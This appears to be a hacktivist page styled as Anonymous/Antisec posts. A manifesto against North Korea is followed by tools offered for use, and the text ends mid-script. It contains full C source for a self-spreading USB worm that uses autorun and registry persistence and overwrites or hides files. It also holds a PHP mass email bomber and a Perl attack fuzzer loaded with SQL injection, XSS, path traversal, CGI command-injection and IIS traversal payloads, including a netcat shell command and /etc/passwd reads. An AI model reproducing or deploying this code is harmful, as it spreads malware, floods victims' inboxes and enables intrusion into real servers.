North Korea: Down the Rabbit Hole

Greetings Fellow Anons, Supporters, and Oppressors Worldwide:

The diplomatic crisis of North Korea has come to our attention, however, even more so, the oppression of the North Korean people by the tyrant Kim Jong-Un has become increasingly more grave. We have decided we must act. The people of North Korea lack even the simplest aspects of cyber freedom. There is no Internet in North Korea but the Intranet. And the Intranet is state-censored, which means e.v.e.r.y.t.h.i.n.g. is about the grandness of North Korea. In other words, it is filled to the brims with other bullshit. We will not stand back and watch as the world lets the atrocities in North Korea take place. So, we have taken up arms against them, our lasers are charged, and our cannons are aimed. The Flickr and Twitter pages of the North Korean propaganda agencies have been hacked and taken down by the forces sailing alongside our freedom cruise. The time to act is now, the time to stand up for the people of North Korea is now. We must if we are to fight ever again for the freedom of the people of this Earth. The. Time. Is. Now. Arise, my friends!

Stay strong and Rise Up In Rebellion, We Must Fight.

-The Royal Anon 

USB Worm

Anons,

We must continue to step up our efforts. Below I have written a USB worm virus. Enjoy! Antisec is strong, stay strong.

#include <windows.h>
#include <stdio.h>
#define IMSG “|__[__]__/=+-\\ SaveItForLater :] USB Worm /-+=\\__[__]__|”
char me[1024];
HKEY hKey;
char *drives[] = {“C:”,”D:”,”E”,”F:”,”G:”,”H:”,”I:”,”J:”,”K:”,”L:”,
                  “M:”,”N:”,”O:”,”P:”,”Q:”,”R:”,”S:”,”T:”,”U:”,”V:”,
                  “W:”,”X:”,”Y:”,”Z:”};
DWORD WINAPI spreadUSB()
{
    while(1)
    {
        Sleep(120000);
        int i;
        for(i = 0;i < 24;i++)
        {
            if((GetDriveType(drives[i])) == DRIVE_REMOVABLE)
            {
                char hldPath[50];
                char usbFile[30] = “\\Driver_Update.exe”;
                char autoRun[50] = “[autorun]\r\nopen=Driver_Update.exe”;
                strcpy(hldPath,drives[i]);
                strcat(hldPath,”\\autorun.inf”);
                FILE *fp = fopen(“autorun.inf”,”w”);
                fprintf(fp,autoRun);
                fclose(fp);
                CopyFile(“autorun.inf”,hldPath,0);
                remove(“autorun.inf”);
                strcat(drives[i],usbFile);
                CopyFile(me,drives[i],0);
            }
            else if((GetDriveType(drives[i])) == DRIVE_CDROM)
            {
                char cdPath[50];
                char cdFile[20] = “\\Worm_Pwn.exe”;
                char cdAutr[50] = “[autorun]\r\nopen=Worm_Pwn.exe”;
                strcpy(cdPath,drives[i]);
                strcat(cdPath,”\\autorun.inf”);
                FILE *fpp = fopen(“autorun.inf”,”w”);
                fprintf(fpp,cdAutr);
                fclose(fpp);
                CopyFile(“autorun.inf”,cdPath,1);
                remove(“autorun.inf”);
                strcat(drives[i],cdFile);
                CopyFile(me,drives[i],0);
            }
            else if((GetDriveType(drives[i])) == DRIVE_REMOTE)
            {
                char remName[20] = “\\Upd_Config.exe”;
                strcat(drives[i],remName);
                CopyFile(me,drives[i],0);
            }
        }
    }
}
BOOL Startup()
{
    char dropTo[1024];
    GetWindowsDirectory(dropTo,1024);
    strcat(dropTo,”\\services.exe”);
    if((CopyFile(me,dropTo,1)) == 0)
        return 0;
    else
    {
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion\\Run”,0,KEY_SET_VALUE,&hKey) == ERROR_SUCCESS)
        {
            RegSetValueEx(hKey,”services”,0,REG_SZ,(const unsigned char*)dropTo,strlen(dropTo));
            RegCloseKey(hKey);
        }
        return 1;
    }
}
DWORD WINAPI changeTitle(LPVOID lParam)
{
    while(1)
    {
        HWND hWnd = GetForegroundWindow();
        SetWindowText(hWnd,”|__[__]__/=+-\\ SaveItForLater :] Worm – illuz1oN /-+=\\__[__]__|”);
    }
}
void winLogin(void)
{
    HKEY hKey;
    char szCaption[] = ”          |__[__]__/=+-\\ illuz1oN /-+=\\__[__]__|”;
    char szText[] = ”             |__[__]__/=+-\\ SaveItForLater :] Worm By illuz1oN /-+=\\__[__]__|”
                    “\nIf you want to remove this worm, contact illuz1oN – illuz1oN@hotmail.co.uk”
                    “\n… AV Companies ~censored~ You …”;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”,0,KEY_SET_VALUE,&hKey);
    RegSetValueEx(hKey,”LegalNoticeCaption”,0,REG_SZ,(const unsigned char*)szCaption,sizeof(szCaption));
    RegCloseKey(hKey);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”,0,KEY_SET_VALUE,&hKey);
    RegSetValueEx(hKey,”LegalNoticeText”,0,REG_SZ,(const unsigned char*)szText,sizeof(szText));
    RegCloseKey(hKey);
}
int WINAPI WinMain (HINSTANCE hinst,HINSTANCE prhin,LPSTR argsx,int in)
{
    GetModuleFileName(0,me,1024);
    CreateMutex(0,0,”-+- illuz1oN -+-“);
    if(GetLastError() == ERROR_ALREADY_EXISTS)
    {
        ExitProcess(0);
    }
    else
    {
        if((Startup()) == 0)
        {
         char szMask[4] = “*.*”;
         DWORD ret = 0;
         WIN32_FIND_DATA fData;
         HANDLE hFind,hFile;
         hFind = FindFirstFile(szMask,&fData);
         if(fData.cFileName == “*.txt”)
         {
            hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
            if(hFile == INVALID_HANDLE_VALUE)
               ExitProcess(0);
            else
            {
               WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
               CloseHandle(hFile);
            }
         }
         else if(fData.cFileName == “*.exe”)
         {
            SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
            CloseHandle(hFile);
         }           
         while (FindNextFile(hFind,&fData))
         {
            if(fData.cFileName == “*.txt”)
            {
               hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
               if(hFile == INVALID_HANDLE_VALUE)
                  ExitProcess(0);
               else
               {
                  WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
                  CloseHandle(hFile);
               }
            }         
            else if(fData.cFileName == “*.exe”)
            {
               SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
               CloseHandle(hFile);
            }               
         }           
         FindClose(hFind);
        }
        else
        {
            winLogin();
            unsigned long title;
            CreateThread(0,0,changeTitle,0,0,&title);
            unsigned long virii;
            CreateThread(0,0,spreadUSB,0,0,&virii);
            Sleep(INFINITE);
        }
    }
}

The Infamous Email Bomber

Greetings Fellow Anons!

For decades, hackers and crackers internationally have been using the email bomber program to create havoc. That is just what the antisec movement needs. I have written a php version of it, enjoy! Stay strong. 

<?php
 

// Remember, you must add in any filtration
// functions yourself, such as the famous
// mysql_real_escape_string(); or even
// htmlentities(); or a custom function...
 
$f_name = isset($_POST['f_name']) ? $_POST['f_name'] : "";
$f_email = isset($_POST['f_email']) ? $_POST['f_email'] : "";
 
$r_email = isset($_POST['r_email']) ? $_POST['r_email'] : "";
 
$subject = isset($_POST['subject']) ? $_POST['subject'] : "";
$message = isset($_POST['message']) ? $_POST['message'] : "";
 
$number = isset($_POST['number']) ? preg_replace('/\..*/', '', $_POST['number']) : "";
 
$header = "From: ".$f_name." <".$f_email.">\n";
$header .= "Reply-To: ".$f_email."\n";
 
echo "<center>\n";
 
if ($f_name != "" || $f_email != "" || $r_email != "" || $subject != "" || $message != "" || $number != "") {
        $errors = "";
 
        if (strlen($f_name) > 40) {
                $errors .= "Your name must be 40 characters or less.<br />\n";
        }
 
        if ($f_email == "") {
                $errors .= "You must enter a sender email address.<br />\n";
        } else {
                if (!preg_match("/^[-0-9A-Z_.]{1,50}@([-0-9A-Z_.]+.){1,50}([0-9A-Z]){2,4}$/i", $f_email)) {
                        $errors .= "You must enter a valid sender email address.<br />\n";
                }
        }
 
        if (strlen($f_email) > 60) {
                $errors .= "Your email must be 60 characters or less.<br />\n";
        }
 
        if ($r_email == "") {
                $errors .= "You must enter a recipient email address.<br />\n";
        } else {
                if (!preg_match("/^[-0-9A-Z_.]{1,50}@([-0-9A-Z_.]+.){1,50}([0-9A-Z]){2,4}$/i", $r_email)) {
                        $errors .= "You must enter a valid recipient email address.<br />\n";
                }
        }
 
        if (strlen($r_email) > 60) {
                $errors .= "The recipient email must be 60 characters or less.<br />\n";
        }
 
        if (strlen($subject) > 40) {
                $errors .= "The subject must be 40 characters or less.<br />\n";
        }
 
        if ($message == "") {
                $errors .= "You must enter a message to send.<br />\n";
        }
 
        if ($number == "") {
                $errors .= "You must enter a number of messages to send.<br />\n";
        } else {
                if ($number < 2) {
                        $errors .= "You must enter a number greater than 1.<br />\n";
                } elseif ($number > 9999) {
                        $errors .= "You must enter a number less than 10000.<br />\n";
                }
        }
 
        if ($errors == "") {
                if ($subject == "") {
                        for($i=1; $i <= $number; $i++){
                                mail($r_email, substr(md5(rand(1, 100)), 0, 5), $message, $header);
                        }
                } else {
                        for($i=1; $i <= $number; $i++){
                                mail($r_email, $subject, $message, $header);
                        }
                }
 
                echo $number." messages have been sent to ".$r_email." successfully.<br />\n<a href='nojavascript...history.go(-1);' title='Start Another Mail Bomb'>Start Another Mail Bomb</a><br />\n";
        } else {
                echo "<span style='color: red;'>n".$errors."</span>\n<a href='nojavascript...history.go(-1);' title='Try Again'>Please Try Again</a><br />\n";
        }
} else {
        echo "* Denotes a required field.<br /><br />nNote that leaving a subject blank<br />nwill generate a random subject<br />nfor every new message.<br /><br />\n";
        echo "<table cellspacing='2' cellpadding='2'>\n";
        echo "<form action='' method='post'>\n";
        echo "<tr>\n";
        echo "<td>Your Name:</td>\n";
        echo "<td><input type='text' name='f_name' size='50' maxlength='40' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Your Email: *</td>\n";
        echo "<td><input type='text' name='f_email' size='50' maxlength='60' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Recipient Email: *</td>\n";
        echo "<td><input type='text' name='r_email' size='50' maxlength='60' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Subject:</td>\n";
        echo "<td><input type='text' name='subject' size='50' maxlength='40' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Message: *</td>\n";
        echo "<td><textarea name='message' rows='5' cols='50'></textarea></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Number Of Messages: *</td>\n";
        echo "<td><input type='text' name='number' size='4' maxlength='4' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td></td>\n";
        echo "<td><input type='submit' value='Start Mail Bomb' /></td>\n";
        echo "</tr>\n";
        echo "</form>\n";
        echo "</table>\n";
}
 
echo "</center>\n";
 
?>

Perl Server Fuzzer

Greetings Anons,

As our revolution grows more and more urgent, our channels of attack and our tools at our disposal must be used to their fullest potential. Below I have written a perl script for server fuzzing, remember the revolution! Do not forgive, nor forget! Stay strong my friends.

 

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use 5.0.10;
use strict;
use warnings;

my $host = $ARGV[0];

 
my @Fuzzer=(
      “cat ../../etc/passwd%00″,”alert(document.cookie);”,”/cgi-bin/*”,”/cgi-bin/”,
      “&0=+1+union+select”,”order+by+5–“,”order+by+100–“,”SELECT * FROM users–“,”../../etc/group”,
      “SELECT * FROM wp_users–“,”cat%20../../etc/group%00”,
      “PUT /pentest/windows-binaries/tools/nc.exe && nc -lvp 8080 -e cmd.exe”,
      “cd /var/www/htdocs && grep phpinfo www”,”‘ or ‘a’=’a”,”or 1=1″,”../../../boot.ini”,
      “‘ or ‘x’=’x–“,”admin’–“,”echo <?php phpinfo()?>”
                       ); 

my @XSS = ( “”>alert(‘XSS’) “, 
            “”>alert(123)<“,
            “”><IMG SRC=”javascript:alert(123);”> “,   
            “”>alert(123)”, 
            “”>”, 
            ” “><IMG SRC=”javascript:alert(‘XSS’)”> “,
            “”><IMG SRC=nojavascript…alert(‘XSS’)> “,
            “”><IMG SRC=nojavascript…alert(‘XSS’)> “,
            “”><IMG “””>alert(“XSS”)”> “,
            ” “><IMG “””>alert(123)> “,
            “”><IMG SRC=nojavascript…alert(String.fromCharCode(88,83,83))> “,
            ” <IMG SRC=”jav%20%20%20%20ascript:alert(‘XSS’)”;”> “,
            “”>alert(document.cookie) “,
            ” “><alert(123);//<“,
            “”><IMG SRC=java%00script:alert(String.fromCharCode(88,83,83))> “,
           ); #<-Add XSS payload strings here. Its a bitch
                                                                                                                                                                                             #to debug if you dont escape quotes
my @SQLtests = ( ” ‘ “,” ” “,” ‘ or 1=1– ” , ” ‘ or ‘a’=’a”,” ‘ or ‘x’=x”, ” ” or “z”=”z”,
                 “1 OR 1=1–“,”1,1″, ” ‘ or 5-5–“,”‘ having 1=1–” );

my @MSSQL= (“‘ having 1=1–“,”1 EXEC SP_ (or EXEC XP_)”,”1 AND USER_NAME() = ‘dbo'”, ” ;exec..cmd=’dir'”,
        “AND 1=(SELECT COUNT(*) FROM tablenames); –“,”+1 UNION ALL SELECT 1,2,name,4,5,6,7 FROM sysObjects WHERE xtype = ‘U’–“,
       “1+UNION/**/ SELECT/**/ALL FROM WHERE “,”1 UNION ALL SELECT 1,2,3,4,5–“,”select * from users having 1=1+GROUP BY uid;–“,
       “-1+union+select+null–“,
       “-1+union+select+null,null;–“,
       “-1+union+select+null,null,null–“,
       “-1+union+select+null,null,null,null–“,
       “-1+union+select+null,null,null,null,null–“,
       “-1+union+select+null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null’–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null’–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null;–“, 
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null–“
                                               ); #<- MSSqli strtings

my @MYSQL= (“1+order+by+2–“,”1+order by 3–“,”order by 50–“,”1+order+by+5–“,”1+order+by+6–“,”1+order+by+7–“,”1+order+by+8–“,
       “1+order+by+9–“,”1+order+by+10–“,”1+order+by+11–“,”1+order+by+12–“,”1+order+by+13”,”1+order+by+14–“,
       “and+1/**/union/**/select”,
       “-1/**/union/**/select/**/null–“,
       “-1/**/union/**/select/**/null,null–“,
       “-1/**/union/**/select/**/null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null–“);

my @LFIlogs = (“../../var/log/httpd/error.log”,”../../var/log/httpd/error_log”,”../../var/log/apache/error.log”,
               “../../var/log/apache/error_log”,”../../var/log/apache2/error.log”,” ../../etc/passwd%00″,
              “../../var/log/apache2/error_log”,”../../logs/error.log”,”../../usr/local/apache/logs/error_log”,
               “../../var/log/apache/error_log”,”../../var/log/apache/error.log”,”../../var/www/logs/error_log”,
               “../../etc/httpd/logs/error_log”,”../../etc/httpd/logs/error.log”,”../../etc/passwd”,
               “../../var/www/logs/error.log”,”../../usr/local/apache/logs/error.log”,”../../etc/group”,
               “../../var/log/error_log”,”../../apache/logs/error.log”,”../../etc/passwd”,”../../etc/group%00″
                                           );#<-LFI and/or traversal to possible LFI strings

my @CGIs = (“/cgi-bin/handler/bah;cat%20%20%20/etc/passwd|?  data=Download”, 
       “../cgi-bin/handler/bah;cat%20%20/etc/passwd |    ?  data=Download”, 
       “/cgi-bin/test-cgi?/* Replace /*”,
       “/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd”,
       “../blah.php?source=/msadc/Samples/../../../../../boot.ini”,
       “../cgi-bin/faxsurvey?/bin/cat%20%20%20%20/etc/passwd”,
       “/cgi-bin/campas?%0acat%0a/etc/passwd%0a”,
       “/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd”,
       “/archive-j457nxiqi3gq59dv/199805/count.cgi.l”,
       “/cgi-bin/pfdispaly.cgi? /../../../../etc/passwd”,
       “/cgi-bin/pfdispaly.cgi?’%0A/bin/uname%20-a|'”,
       “/scripts/convert.bas?../../win.ini”,
       “/cgi-bin/htmlscript? ../../../../etc/passwd”,
       “/cgi-bin/infosrch.cgi cmd=getdoc&db=man&fname=|/bin/id”,
       “/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd”,
       “echo -e “GET http://$host/cgi-bin/loadpage.cgi? user_id=1&file=|”/bin/ls”| HTTP/1.0″ | nc  -lvp 8080”
               ); #Arbitrary cgi strings

my @Unicode = (“/scripts/..%c0%af../winnt/system32/cmd.exe?/c+”,”/scripts..%c1%9c../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+”,”/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+”,”/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+”,”/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%af../winnt/system32/cmd.exe?/c+”,”/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+”,”/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+”,”/MSADC/root.exe?/c+dir”,
               “/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+”,
               “/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir”,”/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir”,”/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%252f../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,”/scripts/..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
“/scripts/root.exe?/c+dir/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,             “/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/c/winnt/system32/cmd.exe?/c+dir”,
               “/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/d/winnt/system32/cmd.exe?/c+dir”,
               “/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir”,
               “/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir”
                            );

my @options = (“1)MySql Fuzz?\n”,”2)MSSQL Fuzz?\n”,”3)XSS fuzz?\n”,”4)CGI Fuzz?\n”,”5)Unicode Fuzz?\n”,”6)General Fuzz?\n”,
               “7)Fuck it, throw it all at it and lets see what happens,lol\n”);

print “***************************************************************************\n”;
print ”                              Perl Fuzzer                                  \n”;
print “***************************************************************************\n”;
print “General attack fuzzer. Perl Fuzzer sends attack strings then outputs the   \n”;
print “the results to an html file. The html files are named goodcode.html or     \n”;
print “badcodes.html depending on server response.You are receiving actual html   \n”;
print “code from the server once opening the file so XSS tends to fire off.All attack\n”;
print “responses will be returned to you in the way it would\’ve live in the browser.\n”;
print “all at once so keep this in mind. Also, be careful running a full scan unless\n”;
print “your system has a decent amount of memory. Opening the large html file can eat\n”;
print “up a large amount of memory. Smaller computers should stick with the single   \n”;
print “scan modes. Have fun 😀                                                       \n”;
print “*****************************************************************************\n”;
print “********Unauthorized scanning is illegal and I take no responsibility********\n”;
print “*****************************************************************************\n”;
foreach my $options(@options){
               print $options,”\n”;
}
print “Scan Type? 1-7:\n”;
my $res = <STDIN>;
chomp $res;

   if($res =~ /1/){
   foreach my $scan(@MYSQL){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending MYSQL attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /2/){
   foreach my $scan(@MSSQL){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending MSSQL attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /3/){
     foreach my $scan(@XSS){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending XSS attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /4/){
     foreach my $scan(@CGIs){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending CGI attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /5/){
      foreach my $scan(@Unicode){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending Unicode attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /6/){
      foreach my $scan(@Fuzzer){
      my $host = $host.$scan;
